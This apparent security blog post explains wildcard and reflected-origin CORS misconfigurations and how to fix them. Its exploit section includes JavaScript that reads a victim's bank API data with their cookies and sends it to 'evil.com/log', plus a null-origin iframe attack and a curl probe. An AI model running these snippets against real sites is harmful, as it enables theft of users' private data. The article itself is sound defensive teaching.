ethical hacking

What is Wildcard CORS Origin? Ways to Exploit, Examples and Impact

Discover the risks of Wildcard CORS origins. Learn how attackers exploit reflected origins and how to secure your API against data exfiltration.

Siddhartha Katiyar

6 min read
What is Wildcard CORS Origin? Ways to Exploit, Examples and Impact

Cross-Origin Resource Sharing (CORS) is a fundamental security mechanism that allows web servers to declare who can access their resources from a different origin. While it was designed to relax the strict constraints of the Same-Origin Policy (SOP), it is frequently misconfigured. One of the most common and dangerous misconfigurations is the use of a wildcard CORS origin. In this guide, we will dive deep into what wildcard CORS is, how it works, why it is dangerous, and the specific ways attackers exploit it to steal sensitive data.

Understanding the Same-Origin Policy (SOP)

Before we can understand CORS, we must understand the Same-Origin Policy (SOP). SOP is a critical security model implemented by web browsers. It prevents a malicious script on one page from obtaining access to sensitive data on another web page.

Two URLs have the same origin if the protocol (e.g., HTTPS), port (e.g., 443), and host (e.g., example.com) are exactly the same. For example:

  • https://example.com/page1 and https://example.com/page2 are the same origin.
  • http://example.com and https://example.com are different origins (different protocol).
  • https://api.example.com and https://example.com are different origins (different host).

Without SOP, if you were logged into your bank at bank.com, and you visited malicious-site.com in another tab, a script on the malicious site could make a request to bank.com/api/balance and read your private information. SOP blocks this by default.

What is CORS?

CORS (Cross-Origin Resource Sharing) was introduced to allow for legitimate cross-origin requests. In the modern web, applications often need to fetch resources from different domains, such as loading fonts from Google Fonts or data from a third-party API.

CORS uses HTTP headers to tell the browser that a web application running at one origin has permission to access selected resources from a server at a different origin. The most important header in this exchange is Access-Control-Allow-Origin.

What is a Wildcard CORS Origin?

A wildcard CORS origin occurs when a server responds with the following header:

Access-Control-Allow-Origin: *

The asterisk (*) is a wildcard character that tells the browser: "Any domain is allowed to access this resource."

While this might seem convenient for public APIs that provide non-sensitive data (like weather info or public stock prices), it becomes a massive security risk when applied to endpoints that handle sensitive user data or require authentication. However, there is a technical catch: browsers generally do not allow the use of credentials (like cookies or Authorization headers) when the Access-Control-Allow-Origin is set to *. If a site tries to send a request with credentials: 'include' and the server responds with a wildcard, the browser will block the response.

The Real Danger: Reflected Origins

Because the wildcard * prevents the use of credentials, many developers implement a "dynamic wildcard" or "Reflected Origin." Instead of hardcoding *, the server reads the Origin header from the incoming request and echoes it back in the Access-Control-Allow-Origin header.

The Vulnerable Request/Response Cycle

  1. Attacker Request:
GET /api/user-profile HTTP/1.1
Host: victim-api.com
Origin: https://attacker-site.com
Cookie: sessionid=12345
  1. Vulnerable Server Response:
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://attacker-site.com
Access-Control-Allow-Credentials: true
Content-Type: application/json

{ "email": "user@example.com", "api_key": "secret-key-99" }

In this scenario, the server is effectively providing a wildcard to any domain that asks, but because it specifies the exact domain in the response, the browser allows the use of cookies. This is the most common way "Wildcard CORS" vulnerabilities are exploited in the real world.

Common CORS Misconfigurations and Exploits

1. Reflected Origin with Credentials

As shown above, this is the most severe flaw. If an application reflects the Origin header and sets Access-Control-Allow-Credentials: true, any website on the internet can make an authenticated request to the API and read the response.

Exploit Example:
An attacker hosts a malicious script on evil.com. When a victim visits evil.com while logged into bank.com, the following JavaScript runs in the background:

fetch('https://bank.com/api/account-details', {
    method: 'GET',
    credentials: 'include'
})
.then(response => response.json())
.then(data => {
    // Send the stolen data to the attacker's server
    fetch('https://evil.com/log?data=' + JSON.stringify(data));
});

Because the bank's server reflects the origin, the browser allows evil.com to read the account details, even though they were fetched using the victim's session cookies.

2. The "Null" Origin Vulnerability

Some developers whitelist the null origin. This often happens when testing locally or when trying to support requests from file:// URIs or sandboxed iframes.

Vulnerable Header:

Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

An attacker can easily bypass this by using a sandboxed iframe to generate a request with a null origin:

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" 
        srcdoc="<script>
            fetch('https://victim.com/api/data', {credentials: 'include'})
            .then(r => r.text())
            .then(t => console.log(t));
        </script>"></iframe>

3. Improper Regex Validation

Developers often try to whitelist subdomains using regular expressions but fail to escape characters properly. For example, a regex intended to match .*\.example\.com might be implemented poorly.

Vulnerable Logic:
if (origin.endsWith("example.com"))

Exploit:
An attacker can register the domain attacker-example.com or not-example.com. Since these strings end with "example.com", the server accepts them as valid origins and reflects them in the CORS header.

4. Trusting Internal Subdomains

Many organizations trust all subdomains (e.g., *.company.com). If a single subdomain (like dev-testing.company.com) is vulnerable to Cross-Site Scripting (XSS), an attacker can use that XSS to bypass CORS protections on the main application and steal data.

Impact of CORS Exploitation

The impact of a misconfigured CORS policy can be devastating, often comparable to a full-scale Cross-Site Request Forgery (CSRF) or even worse, as it allows for data exfiltration.

  1. Data Theft (PII Leakage): Attackers can read sensitive profile information, private messages, or financial records.
  2. Account Takeover: If the API returns sensitive tokens (like CSRF tokens or session IDs), an attacker can steal them to perform actions on behalf of the user.
  3. Internal Network Reconnaissance: If a server has an open CORS policy, an attacker can use a victim's browser as a proxy to scan the organization's internal network (e.g., http://192.168.1.1).
  4. Bypassing CSRF Protections: Many modern applications rely on custom headers (like X-CSRF-Token) for protection. A CORS misconfiguration allows an attacker to send these custom headers from their own site, rendering CSRF protections useless.

How to Test for CORS Vulnerabilities

You can manually test for CORS misconfigurations using curl. By sending a request with a custom Origin header, you can observe how the server responds.

Test Command:

curl -I -X OPTIONS https://api.victim.com/v1/user \
     -H "Origin: https://attacker.com" \
     -H "Access-Control-Request-Method: GET"

What to look for:

  • If the response contains Access-Control-Allow-Origin: https://attacker.com and Access-Control-Allow-Credentials: true, the site is vulnerable.
  • If the response contains Access-Control-Allow-Origin: * and the data is sensitive, it is a risk (though credentials won't work).

Best Practices for Secure CORS Configuration

To protect your application and its users, follow these best practices:

  1. Avoid Wildcards in Authenticated APIs: Never use Access-Control-Allow-Origin: * for endpoints that require authentication or handle private data.
  2. Whitelist Specific Origins: Maintain a strict whitelist of trusted domains. If you have multiple subdomains, list them explicitly rather than using dynamic reflection.
  3. Validate the Origin Header: If you must use dynamic reflection, validate the Origin header against a hardcoded whitelist. Do not rely on simple string matching or weak regex.
  4. Avoid the 'Null' Origin: Never whitelist the null origin. If you need to support local development, use a dedicated environment configuration that is not deployed to production.
  5. Use 'Vary: Origin': If your server generates CORS headers dynamically, ensure you include the Vary: Origin header. This tells caches (like CDNs) that the response depends on the request's origin, preventing a situation where a malicious CORS response is cached for legitimate users.
  6. Set Short Preflight Cache Times: Use Access-Control-Max-Age to cache the results of preflight requests, but keep the duration reasonable to ensure security changes take effect quickly.

Conclusion

Wildcard CORS and reflected origin misconfigurations are silent killers in web security. They effectively dismantle the Same-Origin Policy, turning a secure application into an open book for attackers. By understanding the nuances of how browsers handle these headers and implementing a strict, whitelist-based approach, developers can ensure their data remains protected from cross-origin threats.

To proactively monitor your organization's external attack surface and catch exposures before attackers do, try Jsmon. Jsmon helps you track changes in your infrastructure and identify potential security flaws like misconfigured headers in real-time.

Read more